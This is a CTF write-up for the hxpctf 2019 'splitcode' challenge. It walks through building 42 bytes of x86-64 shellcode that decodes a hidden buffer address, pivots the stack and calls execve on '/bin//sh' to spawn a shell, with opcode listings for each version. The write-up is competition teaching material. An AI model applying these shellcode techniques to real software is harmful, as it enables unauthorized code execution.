hxpctf 2019 - splitcode (256pt)

December 29, 2019
pwn shellcode

splitcode (256pt)


Description: We proudly present: Code Execution as a Service (CEaaS), now on x86-64!

(Flag filename is randomized.)



Essentially the binary accepts 42 bytes of shellcode which is split up in groups of two bytes connected via short jumps. Code execution occurs in a RX buffer and just before our shellcode starts, most of the registers are filled with random data. Immediately after our 42 bytes of shellcode, we hit a syscall followed by hlt. Additionally, bytes 0x0f and 0xcd are filtered out so we can’t call syscall before this point.

During initialization, the program also mmap’s an empty RW buffer (size 0x1000) at a 32-bit address and stores it’s encoded address in the memory region that will be pop'ed into all the registers before our shellcode.

Therefore, it just so happens that rax ^ rdi ^ 0xa07a6c393a248ca1 == RW_buffer.


Our goal is to have the final syscall call execve("/bin/sh", 0, 0) and spawn a shell. Initially, all of the registers are randomized and we don’t have a pointer to memory to store "/bin/sh".

So our first step needs to be decoding the address of the RW buffer pointer. Then we can pivot our stack to this point and use push instructions to store the string.

42 bytes is very constrained for this problem. Initially, we developed “working” shellcode in 52 bytes and spent a while optimizing it to fit the size requirements.

Step 1: Decoding

Since our RW buffer has a 32 bit address, we can optimize the decoding to eax ^ edi ^ 0x3a248ca1 == RW_buffer.

(something like xor eax, 0x12345678 will also zero the top dword of rax which is handy)

So how can we load a 32 bit constant using only two-byte (or one-byte) instructions?

Our first approach involed loading 16 bits and then shifting. rol ebx, <constant> is three bytes but rol ebx, 1 is only two bytes. Therefore we can set ecx and use the loop command to do this 16 times:

(Version 1: 18 bytes)

31 c9 :: xor ecx, ecx
b7 3a :: mov bh, 0x3a
b3 24 :: mov bl, 0x24
b1 10 :: mov cl, 0x10
d1 c3 :: rol ebx, 1
e2 e8 :: loop
b7 8c :: mov bh, 0x8c
31 d8 :: xor eax, ebx
31 c7 :: xor edi, eax

The loop command involves brute forcing half a byte of random jump lengths to hit the previous 2-byte chunk. At the end of this, edi points into the RW buffer (we ignore the bottom byte of the key to save two bytes).

I started looking for a way to do this with magic constants and came up with:

(Version 2: 18 bytes) - no brute force

31 c7 :: xor edi, eax
31 c0 :: xor eax, eax
31 c9 :: xor ecx, ecx
b0 f6 :: mov al, 0xf6
b4 5a :: mov ah, 0x5a
b1 a3 :: mov cl, 0xa3
b5 a3 :: mov ch, 0xa3
f7 e9 :: imul ecx
31 c7 :: xor edi, eax

This version uses the fact that 0xa3a3 * 0x5af6 = 0x3a248ca2

Eventually noopnoop suggested finding a perfect square so we could get rid of some mov's. Shortly after, r3ndom found that 0x7a00 * 0x7a00 == 0x3a240000 which is very nice.

Using this property, I wrote the following:

(Version 3: 12 bytes)

31 c7 :: xor edi, eax
31 c0 :: xor eax, eax
b4 7a :: mov ah, 0x7a
f7 e8 :: imul eax
b4 8d :: mov ah, 0x8d
31 c7 :: xor edi, eax

Step 2: shell

The second part of the shellcode needs to setup the arguments for execve using the newly found buffer. Our general approach was to use the pattern:

mov cl, 0x12
mov ch, 0x34
push cx

This snippet pushes two bytes to the stack and only takes up 6 bytes total.

Our final shellcode for this part looks like:

89 fc :: mov esp, edi       # pivot stack
5e 58 :: pop rsi; pop rax   # zero rsi and rax (useful for later)

b5 'h' :: mov ch, 'h'
b1 's' :: mov cl, 's'
66 51 :: push cx

b5 '/' :: mov ch, '/'
b1 '/' :: mov cl, '/'
66 51 :: push cx

b7 'n' :: mov bh, 'n'
b3 'i' :: mov bl, 'i'
66 53 :: push bx

b5 'b' :: mov ch, 'b'
66 51 :: push cx

54 5f :: push rsp; pop rdi
b0 3b :: mov al, 59

Here we actually write /bin//sh to save an extra two bytes.

comments powered by Disqus